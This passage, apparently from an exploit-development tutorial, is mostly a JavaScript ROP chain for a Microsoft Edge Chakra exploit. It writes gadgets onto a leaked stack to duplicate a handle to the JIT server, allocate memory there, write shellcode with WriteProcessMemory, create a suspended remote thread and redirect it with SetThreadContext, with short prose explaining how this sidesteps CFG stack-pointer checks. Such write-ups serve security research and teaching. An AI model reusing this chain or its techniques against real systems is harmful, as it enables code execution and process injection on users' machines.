write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38     
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        

// Locate store CONTEXT.Rsp and store it in .data of kernelbase.dll
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);        // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a110, kernelbaseHigh); // .data section of kernelbase.dll where we stored CONTEXT.ContextFlags
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x4c37c5, chakraHigh);		// 0x1804c37c5: mov rax, qword [rcx] ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x26f73a, chakraHigh);       // 0x18026f73a: add rax, 0x68 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);        // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a118, kernelbaseHigh); // .data section of kernelbase.dll where we want to store CONTEXT.Rsp
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);      // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)

// Update CONTEXT.Rip to point to a ret gadget directly instead of relying on CreateRemoteThread start routine (which CFG checks)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x26f72a, chakraHigh);      // 0x18026f72a: add rax, 0x60 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x28b4fe, chakraHigh);	   // ret gadget we want to overwrite our remote thread's RIP with 
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xfeab, chakraHigh);        // 0x18000feab: mov qword [rax], rcx ; ret  (Context.Rip = ret_gadget)

After preserving CONTEXT.Rsp, we can manipulate CONTEXT.Rip to directly point to our ret gadget. We don’t really need to save this address, because once we are done writing to it, we simply don’t need to worry about it anymore.

Now that we have RSP preserved, it is finally time to use one last call to WriteProcessMemory to write our final VirtualProtect ROP chain into the JIT process.

WriteProcessMemory ROP Chain (Round 4)

Our last step is to write our ROP chain into the remote process. You may be thinking - β€œConnor, we just hijacked RIP. Why can’t we just hijack RSP instead of writing our payload to the existing stack?” Great question! We know that if we call SetThreadContext, CFG doesn’t perform any validation on the instruction pointer to ensure we aren’t calling into the middle or end of a function. There is now way for CFG to know this! However, CFG does perform some slight validation of the stack pointer on SetThreadContext calls - via a function called RtlGuardIsValidStackPointer.

When the SetThreadContext function is called, this performs a syscall to the kernel (via NtSetContextThread). In the kernel, this eventually leads to the kernel version of NtSetContextThread, which calls PspSetContextThreadInternal.

PspSetContextInternal eventually calls KeVerifyContextRecord. KeVerifyContext record eventually calls a function called RtlGuardIsValidStackPointer.

This feature of CFG checks the TEB to ensure that any call to SetThreadContext has a stack base and limit within the known bounds of the stack managed by the TEB. This is why we cannot change RSP to something like our VirtualAllocEx allocation - as it isn’t within the known stack bounds. Because of this, we have to directly write our ROP payload to the existing stack (which we leaked via GetThreadContext).

With that said, let’s see our last WriteProcessMemory call. Here is how the call will be setup:

	fulljitHandle, 					// PROCESS_ALL_ACCESS handle to JIT server we got from DuplicateHandle call
	addressof(CONTEXT.Rsp),				// Address of our remote thread's stack
	addressof(data_chakra_shellcode_location),	// Address of our VirtualProtect ROP chain in the content process (.data of chakra) (what we want to write (our ROP chain))
	sizeof(rop_chain)				// Size of our ROP chain
	NULL 						// Optional
// alert() for debugging

// Store the value of the handle to the JIT server by way of chakra!ScriptEngine::SetJITConnectionInfo (chakra!JITManager+s_jitManager+0x8)
jitHandle = read64(chakraLo+0x74d838, chakraHigh);

// Helper function to be called after each stack write to increment offset to be written to
function next()

// Begin ROP chain
// Since __fastcall requires parameters 5 and so on to be at RSP+0x20, we actually have to put them at RSP+0x28
// This is because we don't push a return address on the stack, as we don't "call" our APIs, we jump into them
// Because of this we have to compensate by starting them at RSP+0x28 since we can't count on a return address to push them there for us

// DuplicateHandle() ROP chain
// Stage 1 -> Abuse PROCESS_DUP_HANDLE handle to JIT server by performing DuplicateHandle() to get a handle to the JIT server with full permissions
// ACG is disabled in the JIT process
// https://bugs.chromium.org/p/project-zero/issues/detail?id=1299

// Writing our ROP chain to the stack, stack+0x8, stack+0x10, etc. after return address overwrite to hijack control-flow transfer

// HANDLE hSourceProcessHandle (RCX) _should_ come first. However, we are configuring this parameter towards the end, as we need RCX for the lpTargetHandle parameter

// HANDLE hSourceHandle (RDX)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Pseudo-handle to current process

// HANDLE hTargetProcessHandle (R8)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48

// LPHANDLE lpTargetHandle (R9)
// This needs to be a writable address where the full JIT handle will be stored
// Using .data section of chakra.dll in a part where there is no data
0:053> dqs chakra+0x72E000+0x20010
00007ffc`052ae010  00000000`00000000
00007ffc`052ae018  00000000`00000000
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72e128, chakraHigh);      // .data pointer from chakra.dll with a non-zero value to bypass cmp r8d, [rax] future gadget
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server;
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28

// HANDLE hSourceProcessHandle (RCX)
// Handle to the JIT process from the content process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], jitHandle[0], jitHandle[1]);         // PROCESS_DUP_HANDLE HANDLE to JIT server

// Call KERNELBASE!DuplicateHandle
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], duplicateHandle[0], duplicateHandle[1]); // KERNELBASE!DuplicateHandle (Recall this was our original leaked pointer var for kernelbase.dll)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!DuplicateHandle)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!DuplicateHandle - 0x180243949: add rsp, 0x38 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // DWORD dwDesiredAccess (RSP+0x28)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // BOOL bInheritHandle (RSP+0x30)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000002, 0x00000000);             // DWORD dwOptions (RSP+0x38)

// VirtuaAllocEx() ROP chain
// Stage 2 -> Allocate memory in the Edge JIT process (we have a full handle there now)

// DWORD flAllocationType (R9)
// MEM_RESERVE (0x00002000) | MEM_COMMIT (0x00001000)
0:031> ? 0x00002000 | 0x00001000 
Evaluate expression: 12288 = 00000000`00003000
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00003000, 0x00000000);             // MEM_RESERVE | MEM_COMMIT
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28

// SIZE_T dwSize (R8)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00001000, 0x00000000);             // 0x1000 (shellcode size)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48

// LPVOID lpAddress (RDX)
// Let VirtualAllocEx decide where the memory will be located
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL address (let VirtualAllocEx deside where we allocate memory in the JIT process)

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();                                                                     				   // Recall RAX already has a writable pointer in it

// Call KERNELBASE!VirtualAllocEx
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0xff00, kernelbaseHigh); // KERNELBASE!VirtualAllocEx address 
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!VirtualAllocEx)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!VirtualAllocEx - 0x180243949: add rsp, 0x38 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)         
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // DWORD flProtect (RSP+0x28) (PAGE_READWRITE)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38

// WriteProcessMemory() ROP chain
// Stage 3 -> Write our shellcode into the JIT process

// Store the VirtualAllocEx return address in the .data section of kernelbase.dll (It is currently in RAX)

0:015> dq kernelbase+0x216000+0x4000 L2
00007fff`58cfa000  00000000`00000000 00000000`00000000
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where we will store VirtualAllocEx allocation
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)

// SIZE_T nSize (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00001000, 0x00000000);             // SIZE_T nSize (0x1000)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which holds our full perms handle to JIT server
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();                                                                     // Recall RAX already has a writable pointer in it

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000-0x8, kernelbaseHigh); // .data section of kernelbase.dll where we have our VirtualAllocEx allocation
next();                                                                            // (-0x8 to compensate for below where we have to read from the address at +0x8 offset
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x255fa0, chakraHigh);      // mov rdx, qword [rdx+0x08] ; mov rax, rdx ; ret

// LPCVOID lpBuffer (R8) (shellcode in chakra.dll .data section)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000, chakraHigh);    	  // .data section of chakra.dll holding our shellcode

// Call KERNELBASE!WriteProcessMemory
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)         
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38

// CreateRemoteThread() ROP chain
// Stage 4 -> Create a thread within the JIT process, but create it suspended
// This will allow the thread to _not_ execute until we are ready
// LPTHREAD_START_ROUTINE can be set to anything, as CFG will check it and we will end up setting RIP directly later
// We will eventually hijack RSP of this thread with a ROP chain, and by setting RIP to a return gadget our thread, when executed, will return into our ROP chain
// We will update the thread later via another ROP chain to call SetThreadContext()

// This can be any random data, since it will never be executed
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x28b4fe, chakraHigh);	   // 0x180043c63: Anything we want - this will never get executed
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which holds our full perms handle to JIT server
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)

write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL (default security properties)

// SIZE_T dwStackSize (R8)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);      // 0x180576231: pop r8 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // 0 (default stack size)

// Call KERNELBASE!CreateRemoteThread
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0xdcfd0, kernelbaseHigh); // KERNELBASE!CreateRemoteThread
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!CreateRemoteThread)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!CreateRemoteThread - 0x180243949: add rsp, 0x38 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // LPVOID lpParameter (RSP+0x28)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // DWORD dwCreationFlags (RSP+0x30) (CREATE_SUSPENDED to avoid executing the thread routine)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // LPDWORD lpThreadId (RSP+0x38)

// WriteProcessMemory() ROP chain (Number 2)
// Stage 5 -> Update the final ROP chain, currently in the charka.dll .data section, with the address of our shellcode in the pop rcx gadget for lpAddress

// Before, we need to preserve the thread HANDLE returned by CreateRemoteThread
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a100, kernelbaseHigh); // .data section of kernelbase.dll where we will store the thread HANDLE
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)

// SIZE_T nSize (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000008, 0x00000000);             // SIZE_T nSize (0x8)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Current process

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000+ropoffsetOne, chakraHigh); // .data section of chakra.dll where our final ROP chain is

// LPCVOID lpBuffer (R8) (Our kernelbase.dll .data section address which points to the value we want to write, the allocation of the VirtualAllocEx allocation)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where the VirtualAllocEx allocation is stored

// Call KERNELBASE!WriteProcessMemory
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
